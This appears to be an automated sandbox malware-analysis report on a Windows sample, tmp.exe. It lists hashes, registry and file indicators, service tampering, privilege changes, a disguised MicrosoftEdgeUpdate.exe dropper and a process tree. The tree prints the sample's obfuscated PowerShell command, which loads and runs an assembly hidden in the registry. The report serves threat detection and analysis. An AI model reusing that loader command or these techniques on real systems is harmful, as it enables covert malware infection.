Analysis
-
max time kernel
150s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
19-01-2023 04:56
Behavioral task
behavioral1
Sample
tmp.exe
Resource
win7-20220812-en
General
-
Target
tmp.exe
-
Size
4.9MB
-
MD5
e2c876ff5b1f24b59d928e595234cdef
-
SHA1
82d06b09b2a8c514929aab293242d4796d4ee39f
-
SHA256
e0622827883ae65735b2d662eb26e75aa70e1d90d5d37991a566a4ab9ff99244
-
SHA512
9562c0eb5485578c25f741beb5cb8206b2b4c7037e9a3bfa553ff833280c6788f730808e6fa93c7100486cd7877a33adddf8225944779638d304d1a42c66d7fd
-
SSDEEP
98304:ZXMmA6BgrvHq3uwG/9SopFAVrSkgAm2K2fklNvpJtpqCutXE:ZXb0TwmFzQ5PK2fklNvpJyCut
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe -
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
Processes:
WerFault.exeWerFault.exedescription pid process target process PID 2812 created 4404 2812 WerFault.exe DllHost.exe PID 4488 created 3296 4488 WerFault.exe DllHost.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
Processes:
powershell.EXEsvchost.exepowershell.EXEdescription pid process target process PID 3504 created 604 3504 powershell.EXE winlogon.exe PID 4252 created 4404 4252 svchost.exe DllHost.exe PID 4252 created 3296 4252 svchost.exe DllHost.exe PID 380 created 604 380 powershell.EXE winlogon.exe -
Drops file in Drivers directory 2 IoCs
Processes:
tmp.exeMicrosoftEdgeUpdate.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts tmp.exe File opened for modification C:\Windows\system32\drivers\etc\hosts MicrosoftEdgeUpdate.exe -
Executes dropped EXE 1 IoCs
Processes:
MicrosoftEdgeUpdate.exepid process 4276 MicrosoftEdgeUpdate.exe -
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 2128 takeown.exe 1072 icacls.exe 5088 takeown.exe 3464 icacls.exe -
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule behavioral2/memory/988-132-0x0000000000140000-0x0000000000ACA000-memory.dmp vmprotect C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe vmprotect C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe vmprotect -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
tmp.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation tmp.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 2128 takeown.exe 1072 icacls.exe 5088 takeown.exe 3464 icacls.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 25 ip-api.com -
Drops file in System32 directory 18 IoCs
Processes:
powershell.EXEsvchost.exepowershell.EXEpowershell.EXEsvchost.exeOfficeClickToRun.exeMicrosoftEdgeUpdate.exepowershell.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868 svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MicrosoftEdgeUpdate.exe.log MicrosoftEdgeUpdate.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C0427F5F77D9B3A439FC620EDAAB6177 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE svchost.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
tmp.exepowershell.EXEpowershell.EXEdescription pid process target process PID 988 set thread context of 4140 988 tmp.exe conhost.exe PID 3504 set thread context of 4088 3504 powershell.EXE dllhost.exe PID 380 set thread context of 748 380 powershell.EXE dllhost.exe -
Drops file in Program Files directory 3 IoCs
Processes:
powershell.exeMicrosoftEdgeUpdate.exedescription ioc process File created C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe powershell.exe File opened for modification C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe powershell.exe File created C:\Program Files\Google\Libs\WR64.sys MicrosoftEdgeUpdate.exe -
Drops file in Windows directory 4 IoCs
Processes:
conhost.exedescription ioc process File created C:\Windows\Tasks\dialersvc64.job conhost.exe File opened for modification C:\Windows\Tasks\dialersvc64.job conhost.exe File created C:\Windows\Tasks\dialersvc32.job conhost.exe File opened for modification C:\Windows\Tasks\dialersvc32.job conhost.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 4320 sc.exe 3616 sc.exe 2188 sc.exe 4092 sc.exe 4772 sc.exe 3304 sc.exe 4520 sc.exe 4512 sc.exe 4424 sc.exe 772 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 3404 3296 WerFault.exe DllHost.exe 3304 4404 WerFault.exe DllHost.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
WerFault.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.EXEpowershell.EXEOfficeClickToRun.exepowershell.EXEpowershell.exeMicrosoftEdgeUpdate.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={CBAD3673-59B1-4CAE-9103-3B3D1CDA7408}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" MicrosoftEdgeUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE -
Modifies registry key 1 TTPs 18 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 3492 reg.exe 3404 reg.exe 1876 reg.exe 2288 reg.exe 4660 reg.exe 1516 reg.exe 1736 reg.exe 4136 reg.exe 4812 reg.exe 3968 reg.exe 3344 reg.exe 2800 reg.exe 3620 reg.exe 4536 reg.exe 1476 reg.exe 1816 reg.exe 3100 reg.exe 4464 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exetmp.exepowershell.exepowershell.EXEdllhost.exepowershell.EXEWerFault.exeWerFault.exesvchost.exepid process 3232 powershell.exe 3232 powershell.exe 988 tmp.exe 1284 powershell.exe 1284 powershell.exe 3504 powershell.EXE 3504 powershell.EXE 3504 powershell.EXE 4088 dllhost.exe 4088 dllhost.exe 4088 dllhost.exe 4088 dllhost.exe 4088 dllhost.exe 4088 dllhost.exe 4088 dllhost.exe 4088 dllhost.exe 4088 dllhost.exe 4088 dllhost.exe 4088 dllhost.exe 4088 dllhost.exe 380 powershell.EXE 4088 dllhost.exe 4088 dllhost.exe 4088 dllhost.exe 4088 dllhost.exe 4088 dllhost.exe 4088 dllhost.exe 4088 dllhost.exe 4088 dllhost.exe 4088 dllhost.exe 4088 dllhost.exe 4088 dllhost.exe 4088 dllhost.exe 4088 dllhost.exe 4088 dllhost.exe 3404 WerFault.exe 3404 WerFault.exe 4088 dllhost.exe 4088 dllhost.exe 3304 WerFault.exe 3304 WerFault.exe 4088 dllhost.exe 4088 dllhost.exe 4088 dllhost.exe 4088 dllhost.exe 4088 dllhost.exe 4088 dllhost.exe 4088 dllhost.exe 4088 dllhost.exe 380 powershell.EXE 4252 svchost.exe 4252 svchost.exe 4088 dllhost.exe 4088 dllhost.exe 4088 dllhost.exe 4088 dllhost.exe 4252 svchost.exe 4252 svchost.exe 4088 dllhost.exe 4088 dllhost.exe 4088 dllhost.exe 4088 dllhost.exe 4088 dllhost.exe 4088 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 2864 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetmp.exetakeown.exepowershell.exepowershell.EXEdescription pid process Token: SeDebugPrivilege 3232 powershell.exe Token: SeShutdownPrivilege 1540 powercfg.exe Token: SeCreatePagefilePrivilege 1540 powercfg.exe Token: SeShutdownPrivilege 4172 powercfg.exe Token: SeCreatePagefilePrivilege 4172 powercfg.exe Token: SeShutdownPrivilege 448 powercfg.exe Token: SeCreatePagefilePrivilege 448 powercfg.exe Token: SeShutdownPrivilege 3320 powercfg.exe Token: SeCreatePagefilePrivilege 3320 powercfg.exe Token: SeDebugPrivilege 988 tmp.exe Token: SeTakeOwnershipPrivilege 2128 takeown.exe Token: SeDebugPrivilege 1284 powershell.exe Token: SeDebugPrivilege 3504 powershell.EXE Token: SeIncreaseQuotaPrivilege 1284 powershell.exe Token: SeSecurityPrivilege 1284 powershell.exe Token: SeTakeOwnershipPrivilege 1284 powershell.exe Token: SeLoadDriverPrivilege 1284 powershell.exe Token: SeSystemProfilePrivilege 1284 powershell.exe Token: SeSystemtimePrivilege 1284 powershell.exe Token: SeProfSingleProcessPrivilege 1284 powershell.exe Token: SeIncBasePriorityPrivilege 1284 powershell.exe Token: SeCreatePagefilePrivilege 1284 powershell.exe Token: SeBackupPrivilege 1284 powershell.exe Token: SeRestorePrivilege 1284 powershell.exe Token: SeShutdownPrivilege 1284 powershell.exe Token: SeDebugPrivilege 1284 powershell.exe Token: SeSystemEnvironmentPrivilege 1284 powershell.exe Token: SeRemoteShutdownPrivilege 1284 powershell.exe Token: SeUndockPrivilege 1284 powershell.exe Token: SeManageVolumePrivilege 1284 powershell.exe Token: 33 1284 powershell.exe Token: 34 1284 powershell.exe Token: 35 1284 powershell.exe Token: 36 1284 powershell.exe Token: SeDebugPrivilege 3504 powershell.EXE Token: SeIncreaseQuotaPrivilege 1284 powershell.exe Token: SeSecurityPrivilege 1284 powershell.exe Token: SeTakeOwnershipPrivilege 1284 powershell.exe Token: SeLoadDriverPrivilege 1284 powershell.exe Token: SeSystemProfilePrivilege 1284 powershell.exe Token: SeSystemtimePrivilege 1284 powershell.exe Token: SeProfSingleProcessPrivilege 1284 powershell.exe Token: SeIncBasePriorityPrivilege 1284 powershell.exe Token: SeCreatePagefilePrivilege 1284 powershell.exe Token: SeBackupPrivilege 1284 powershell.exe Token: SeRestorePrivilege 1284 powershell.exe Token: SeShutdownPrivilege 1284 powershell.exe Token: SeDebugPrivilege 1284 powershell.exe Token: SeSystemEnvironmentPrivilege 1284 powershell.exe Token: SeRemoteShutdownPrivilege 1284 powershell.exe Token: SeUndockPrivilege 1284 powershell.exe Token: SeManageVolumePrivilege 1284 powershell.exe Token: 33 1284 powershell.exe Token: 34 1284 powershell.exe Token: 35 1284 powershell.exe Token: 36 1284 powershell.exe Token: SeIncreaseQuotaPrivilege 1284 powershell.exe Token: SeSecurityPrivilege 1284 powershell.exe Token: SeTakeOwnershipPrivilege 1284 powershell.exe Token: SeLoadDriverPrivilege 1284 powershell.exe Token: SeSystemProfilePrivilege 1284 powershell.exe Token: SeSystemtimePrivilege 1284 powershell.exe Token: SeProfSingleProcessPrivilege 1284 powershell.exe Token: SeIncBasePriorityPrivilege 1284 powershell.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
Conhost.exeConhost.exeConhost.exepid process 4812 Conhost.exe 3140 Conhost.exe 3100 Conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
tmp.execmd.execmd.exepowershell.EXEdescription pid process target process PID 988 wrote to memory of 3232 988 tmp.exe powershell.exe PID 988 wrote to memory of 3232 988 tmp.exe powershell.exe PID 988 wrote to memory of 4532 988 tmp.exe cmd.exe PID 988 wrote to memory of 4532 988 tmp.exe cmd.exe PID 988 wrote to memory of 2064 988 tmp.exe cmd.exe PID 988 wrote to memory of 2064 988 tmp.exe cmd.exe PID 4532 wrote to memory of 4512 4532 cmd.exe sc.exe PID 4532 wrote to memory of 4512 4532 cmd.exe sc.exe PID 2064 wrote to memory of 1540 2064 cmd.exe powercfg.exe PID 2064 wrote to memory of 1540 2064 cmd.exe powercfg.exe PID 4532 wrote to memory of 3616 4532 cmd.exe sc.exe PID 4532 wrote to memory of 3616 4532 cmd.exe sc.exe PID 2064 wrote to memory of 4172 2064 cmd.exe powercfg.exe PID 2064 wrote to memory of 4172 2064 cmd.exe powercfg.exe PID 2064 wrote to memory of 448 2064 cmd.exe powercfg.exe PID 2064 wrote to memory of 448 2064 cmd.exe powercfg.exe PID 4532 wrote to memory of 4424 4532 cmd.exe sc.exe PID 4532 wrote to memory of 4424 4532 cmd.exe sc.exe PID 2064 wrote to memory of 3320 2064 cmd.exe powercfg.exe PID 2064 wrote to memory of 3320 2064 cmd.exe powercfg.exe PID 4532 wrote to memory of 772 4532 cmd.exe sc.exe PID 4532 wrote to memory of 772 4532 cmd.exe sc.exe PID 4532 wrote to memory of 2188 4532 cmd.exe sc.exe PID 4532 wrote to memory of 2188 4532 cmd.exe sc.exe PID 4532 wrote to memory of 1476 4532 cmd.exe reg.exe PID 4532 wrote to memory of 1476 4532 cmd.exe reg.exe PID 4532 wrote to memory of 1816 4532 cmd.exe reg.exe PID 4532 wrote to memory of 1816 4532 cmd.exe reg.exe PID 4532 wrote to memory of 3492 4532 cmd.exe reg.exe PID 4532 wrote to memory of 3492 4532 cmd.exe reg.exe PID 4532 wrote to memory of 1516 4532 cmd.exe reg.exe PID 4532 wrote to memory of 1516 4532 cmd.exe reg.exe PID 4532 wrote to memory of 1736 4532 cmd.exe reg.exe PID 4532 wrote to memory of 1736 4532 cmd.exe reg.exe PID 4532 wrote to memory of 2128 4532 cmd.exe takeown.exe PID 4532 wrote to memory of 2128 4532 cmd.exe takeown.exe PID 4532 wrote to memory of 1072 4532 cmd.exe icacls.exe PID 4532 wrote to memory of 1072 4532 cmd.exe icacls.exe PID 988 wrote to memory of 4140 988 tmp.exe conhost.exe PID 988 wrote to memory of 4140 988 tmp.exe conhost.exe PID 988 wrote to memory of 4140 988 tmp.exe conhost.exe PID 988 wrote to memory of 4140 988 tmp.exe conhost.exe PID 988 wrote to memory of 4140 988 tmp.exe conhost.exe PID 988 wrote to memory of 4140 988 tmp.exe conhost.exe PID 988 wrote to memory of 4140 988 tmp.exe conhost.exe PID 988 wrote to memory of 4140 988 tmp.exe conhost.exe PID 988 wrote to memory of 4140 988 tmp.exe conhost.exe PID 988 wrote to memory of 4140 988 tmp.exe conhost.exe PID 988 wrote to memory of 4140 988 tmp.exe conhost.exe PID 988 wrote to memory of 1284 988 tmp.exe powershell.exe PID 988 wrote to memory of 1284 988 tmp.exe powershell.exe PID 4532 wrote to memory of 3404 4532 cmd.exe WerFault.exe PID 4532 wrote to memory of 3404 4532 cmd.exe WerFault.exe PID 3504 wrote to memory of 4088 3504 powershell.EXE dllhost.exe PID 3504 wrote to memory of 4088 3504 powershell.EXE dllhost.exe PID 3504 wrote to memory of 4088 3504 powershell.EXE dllhost.exe PID 3504 wrote to memory of 4088 3504 powershell.EXE dllhost.exe PID 3504 wrote to memory of 4088 3504 powershell.EXE dllhost.exe PID 3504 wrote to memory of 4088 3504 powershell.EXE dllhost.exe PID 3504 wrote to memory of 4088 3504 powershell.EXE dllhost.exe PID 3504 wrote to memory of 4088 3504 powershell.EXE dllhost.exe PID 3504 wrote to memory of 4088 3504 powershell.EXE dllhost.exe PID 3504 wrote to memory of 4088 3504 powershell.EXE dllhost.exe PID 3504 wrote to memory of 4088 3504 powershell.EXE dllhost.exe
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{26559d6a-db20-41ff-a827-50f937ea7091}2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{ac2a3d02-66ba-45a5-a2d1-18057f5fcde4}2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
